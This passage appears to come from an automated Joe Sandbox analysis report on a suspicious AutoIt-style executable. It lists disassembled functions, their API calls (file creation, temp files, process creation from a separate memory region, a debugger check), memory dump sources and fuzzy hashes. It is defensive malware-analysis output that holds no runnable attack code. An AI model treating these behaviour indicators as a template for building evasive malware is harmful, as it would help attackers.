                                    • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction Fuzzy Hash: 7951A2B0A00305ABDB248FA9888566EB7B9AF42324F24C729F825962D0D775DF508BC0
                                    Function 009CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00984517: _fseek.LIBCMT ref: 0098452F
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC65D
                                      • Part of subcall function 009CC56D: _wcscmp.LIBCMT ref: 009CC670
                                    • _free.LIBCMT ref: 009CC4DD
                                    • _free.LIBCMT ref: 009CC4E4
                                    • _free.LIBCMT ref: 009CC54F
                                      • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                      • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                    • _free.LIBCMT ref: 009CC557
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: 5018c003b2770254cf6d6f7fa2a1ed5b0fd5bc7f3c9d7989a998b0a79ed791d3
                                    • Instruction ID: bd44cbeff4031a48c0e3a6762d54e4d1a61b9199559fa50fe3c2d89635e1149b
                                    • Opcode Fuzzy Hash: 5018c003b2770254cf6d6f7fa2a1ed5b0fd5bc7f3c9d7989a998b0a79ed791d3
                                    • Instruction Fuzzy Hash: 68514EB1E04219AFDB149F64DC81BADBBB9EF48310F1044AEF25DA3251DB715A808F59
                                    Function 009840E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009F3725
                                    • 7516D0D0.COMDLG32 ref: 009F376F
                                      • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                      • Part of subcall function 009840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: NamePath$7516FullLong_memset
                                    • String ID: X
                                    • API String ID: 3926756254-3081909835
                                    • Opcode ID: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                    • Instruction ID: 8320e39998196686aa3b36b395c024da4e2592e46d88db5bbcb4e9f00459de10
                                    • Opcode Fuzzy Hash: f1bcd3e0c126fe58c62714a4954e901ff151f61da1a657df01a30a546137ea62
                                    • Instruction Fuzzy Hash: 0E21A871A141989FCF01EFD4C845BEE7BF89F99304F008059E505EB341DBB85A898F65
                                    Function 00CA8E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00CA8E4D
                                    • ExitProcess.KERNEL32(00000000), ref: 00CA8E6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$CreateExit
                                    • String ID: D
                                    • API String ID: 126409537-2746444292
                                    • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction ID: eeb8c8eae30a0a5ba40e292bc558e28d21e81681570a44ba12f422211f385608
                                    • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction Fuzzy Hash: 37F0EC7554024DABDB60EFE0CC49FEE7778BF08705F508918BA1A9A184DB749A089B61
                                    Function 009CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 009CC72F
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009CC746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                    • Instruction ID: 1acf0c4767ea78bc6ff420d7d7862763af22229bfd70b47af1f567cef363188b
                                    • Opcode Fuzzy Hash: 8165df6e732b788588cfe06ad68caa0808bd4348c270085a19ae8d11c78f0c64
                                    • Instruction Fuzzy Hash: 20D05E7250030EBBDB10EBE0DC0EFCA776CA704704F0005A07750A50B1DAB4E69B8B54
                                    Function 009DF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                    • Instruction ID: 00b13ac2e8c232cfa6b9c9afcfdcdc129a0d9cc9d1be226837d3d5837a348adf
                                    • Opcode Fuzzy Hash: 72da08699e4381460ef7ac4fc41a126b14d2edce25c83c52aea08475ca96f940
                                    • Instruction Fuzzy Hash: 1CF16A716043419FCB10DF28C891B6AB7E5BFC8314F14896EF99A9B392D734E945CB82
                                    Function 00984FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00985022
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell__memset
                                    • String ID:
                                    • API String ID: 928536360-0
                                    • Opcode ID: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                    • Instruction ID: d345d2fccc6737b0e2dd772a8c21811a156b9ab505a27fb70a6974333f30d9c4
                                    • Opcode Fuzzy Hash: 68ea5320907efcd707ad80caf7a11c43682e23e0770f7755147cbcf79e283e4a
                                    • Instruction Fuzzy Hash: 9E3161B5504701CFD721EF68D845697BBE8FF89304F00092EE69E87351E772A989CB92
                                    Function 009A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 009A3973
                                      • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81E9
                                      • Part of subcall function 009A81C2: __NMSG_WRITE.LIBCMT ref: 009A81F3
                                    • __NMSG_WRITE.LIBCMT ref: 009A397A
                                      • Part of subcall function 009A821F: GetModuleFileNameW.KERNEL32(00000000,00A40312,00000104,00000000,00000001,00000000), ref: 009A82B1
                                      • Part of subcall function 009A821F: ___crtMessageBoxW.LIBCMT ref: 009A835F
                                      • Part of subcall function 009A1145: ___crtCorExitProcess.LIBCMT ref: 009A114B
                                      • Part of subcall function 009A1145: ExitProcess.KERNEL32 ref: 009A1154
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                    • Instruction ID: f1066e868426c7ff09647d279b4cc672865869225fafa7ce99020550e8a9086d
                                    • Opcode Fuzzy Hash: ee62c520008f140f1686acc14663d8757e76ea1157ba10237d08d625a22c2fec
                                    • Instruction Fuzzy Hash: D301B536345301DAE6217BB8EC46B6B739C9FC3764F218125F6059B392DFB49D0186E0
                                    Function 009CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009CC385,?,?,?,?,?,00000004), ref: 009CC6F2
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009CC708
                                    • CloseHandle.KERNEL32(00000000,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC70F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: ee79da8c8f03acd2656866713318312ab0c6389a7660661386b5dbad3e59b7ba
                                    • Instruction ID: d62a209aa522a4a0c7f214362866109eda39126882d4db084d33174eb410fa54
                                    • Opcode Fuzzy Hash: ee79da8c8f03acd2656866713318312ab0c6389a7660661386b5dbad3e59b7ba
                                    • Instruction Fuzzy Hash: C5E08633140218B7D7215BD4AC09FCA7F18EB05760F104210FB14690E097B125538799
                                    Function 009CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 009CBB72
                                      • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                      • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                    • _free.LIBCMT ref: 009CBB83
                                    • _free.LIBCMT ref: 009CBB95
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 8aabdc7c5b8b24ec3e6cd746ab92beece9ca5442ccfa872a0ae046f14ec4a344
                                    • Instruction ID: 508681b008552f981ea6066e29bc8f5808ab3a123371406cb72a543aafc28401
                                    • Opcode Fuzzy Hash: 8aabdc7c5b8b24ec3e6cd746ab92beece9ca5442ccfa872a0ae046f14ec4a344
                                    • Instruction Fuzzy Hash: 90E012A1A4174147DA2465796E45FB337EC4F46361F14081DB499E7146CF24EC4085F4
                                    Function 00982322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009822A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00982303
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009825A1
                                    • CoInitialize.OLE32(00000000), ref: 00982618
                                    • CloseHandle.KERNEL32(00000000), ref: 009F503A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 458326420-0
                                    • Opcode ID: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
                                    • Instruction ID: 5d04e6a69485e34dbd895cf33232b78c4ce3da3158cf672c0f82b978149c7058
                                    • Opcode Fuzzy Hash: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
                                    • Instruction Fuzzy Hash: 0371BBBC9413858B8344EFEAE990594BBA4FBDA344790423ED119CB3B1DBB25482CF55
                                    Function 009CBBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID: EA06
                                    • API String ID: 2638373210-3962188686
                                    • Opcode ID: 2c2408c1a71edc864ce3cb424d2fada07c06e66c6472ecae88b6da45b7c292a4
                                    • Instruction ID: c16115aa38523dbe6e70f4f23d6b64ea3f383d159cf5fe158d0275f1dd03cc4b
                                    • Opcode Fuzzy Hash: 2c2408c1a71edc864ce3cb424d2fada07c06e66c6472ecae88b6da45b7c292a4
                                    • Instruction Fuzzy Hash: 0501B572904218BEDB28C7ACC856FEEBBF89B15301F00459EF592D6181E5B8A7088B60
                                    Function 009CFE7E Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                    Download Yara Rule
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 009CFEDD
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 009CFF96
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLast__wsplitpath
                                    • String ID:
                                    • API String ID: 2679896820-0
                                    • Opcode ID: d4eb283bc6007c0b98206d0c34914c25d4caccdb6055283493d5c586ce68630b
                                    • Instruction ID: 1c8ecc6cd07fb0c23d58d24dde2cd1bb67a1c1a3e6cebe0d78bdd11442ecd959
                                    • Opcode Fuzzy Hash: d4eb283bc6007c0b98206d0c34914c25d4caccdb6055283493d5c586ce68630b
                                    • Instruction Fuzzy Hash: 425171356043019FCB14EF68C4A1FAAB3E9EF89314F14856DF95A8B392DB30E945CB52
                                    Function 009A8E63 Relevance: 3.1, APIs: 2, Instructions: 127COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __getbuf.LIBCMT ref: 009A8EFA
                                    • __lseeki64.LIBCMT ref: 009A8F6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                    • String ID:
                                    • API String ID: 3311320906-0
                                    • Opcode ID: db2c5aed308e20de4ee46aa7ef8d7fc4db1fe59a0cbf54743a7b1fafbfd8adf8
                                    • Instruction ID: ef66d4ae2e064a864b27d7dabde825f454af70a9f6c4a69a654be16c8610a129
                                    • Opcode Fuzzy Hash: db2c5aed308e20de4ee46aa7ef8d7fc4db1fe59a0cbf54743a7b1fafbfd8adf8
                                    • Instruction Fuzzy Hash: ED41D471500B029FD7289B68C851B7B77A99F86330B248A1DE4BA862D1DB74D8418BD1
                                    Function 00983A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • 745AC8D0.UXTHEME ref: 00983A73
                                      • Part of subcall function 009A1405: __lock.LIBCMT ref: 009A140B
                                      • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00983AF3
                                      • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983B08
                                      • Part of subcall function 00983D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                      • Part of subcall function 00983D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                      • Part of subcall function 00983D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                      • Part of subcall function 00983D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983AB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 3809921791-0
                                    • Opcode ID: 2ceb93e448c119bc247b14a8e33c413037cb2120cc439ddb4bde83c5cd38fe2d
                                    • Instruction ID: fe22c88dc19f85efc026247672d9f2124057e674ff52a7538e9eb71d5a0fb390
                                    • Opcode Fuzzy Hash: 2ceb93e448c119bc247b14a8e33c413037cb2120cc439ddb4bde83c5cd38fe2d
                                    • Instruction Fuzzy Hash: 6F119D799043459BC700EFA9E845A1AFBE8EFD5710F008A1EF584872B1DB719586CB92
                                    Function 009847FF Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00984582,?,?,?,?,00982E1A), ref: 0098482D
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00984582,?,?,?,?,00982E1A), ref: 009F4089
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: fc300146449e01d102a90cad6e1eb526721ece673bbbb2067c6dd8822bbe3d2e
                                    • Instruction ID: e978cb0b0c345af5162f43387e323370cda27f19f4c9a393de43fb682d3ff4f0
                                    • Opcode Fuzzy Hash: fc300146449e01d102a90cad6e1eb526721ece673bbbb2067c6dd8822bbe3d2e
                                    • Instruction Fuzzy Hash: 6E018070144349BEF3205E64CC8AF663ADCEF01768F108318BAE55A2E0C6B51C45CF50
                                    Function 009AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 009AEA29
                                    • __close_nolock.LIBCMT ref: 009AEA42
                                      • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                    • String ID:
                                    • API String ID: 1046115767-0
                                    • Opcode ID: a6d6c7cd62c54fdf85e7c44365530e3b3bd5678a81d51e397ab0a145aa122323
                                    • Instruction ID: ab1adb769c226374799a33618d11cfbf708dbf84a6c39411d4f6aa78d9a90c86
                                    • Opcode Fuzzy Hash: a6d6c7cd62c54fdf85e7c44365530e3b3bd5678a81d51e397ab0a145aa122323
                                    • Instruction Fuzzy Hash: 25116172909A109BD712FFA8D8427597A616FC3331F2A4740E4745F2E3CBB88D419BE5
